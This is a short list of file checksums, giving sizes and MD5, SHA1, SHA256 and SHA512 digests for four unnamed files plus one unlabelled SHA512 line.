SHA512: d4808d041c4d880e10220fd60751cfec336f185396a49efec4c1f9bc7f9ebf8e5db975304f6cce8aee7d8e130dfb8489e2f11600c6ac4f990ee3705462940558

Filesize: 141KB
MD5: 8f4cdaed2399204619310cd76fd11056
SHA1: 0f06ef5acde4f1e99a12cfc8489c1163dba910d1
SHA256: df14c4dcb9793a1298c3ef531299479c8bea32a9e8124355e6d3ba6b15416213
SHA512: 3d1e0453f10bece7b65fee3806bce9e36e2c526daa72d66774ed47684a591a978a80894b1643709e76db0adcf6f2dca189aa6413786a9b70c742ceaeec5b80dc

Filesize: 738KB
MD5: b158d8d605571ea47a238df5ab43dfaa
SHA1: bb91ae1f2f7142b9099e3cc285f4f5b84de568e4
SHA256: ca763693cc25d316f14a9ebad80ebf00590329550c45adb7e5205486533c2504
SHA512: 56aef59c198acf2fcd0d95ea6e32ce1c706e5098a0800feff13ddb427bfb4d538de1c415a5cb5496b09a5825155e3abb1c13c8c37dc31549604bd4d63cb70591

Filesize: 758KB
MD5: fb4665320c9da54598321c59cc5ed623
SHA1: 89e87b3cc569edd26b5805244cfacb2f9c892bc7
SHA256: 9fb3156c665211a0081b189142c1d1ab18cda601ee54d5f5d8883ecfa4177a59
SHA512: b205552a3cfbaa2202e6ef7e39e229af167b2342a7dc4a2f4cadfe4d05000966cf19e9e208e44d6bb0fd6a56f4283caeed9c13f523e5b301b87f79febb1840cf

Filesize: 8.4MB
MD5: 91b9983492862e7d6b6f695d48b64a4e
SHA1: af03bcecd1af49ab3ccf61f79f58fc690d29796b
SHA256: 800fea008bf2733b336f02d6312a51169c9e7d30f1fd78193ddd56fd41d51e3e
SHA512: 006c1d443419f9fe3eab966f28a1fea6b30dbb98379eb08d67240c821c9310129a63c29312081d70d2e0eaecc26cde6e95afe5be9cf4cb3ad8241cfc76437694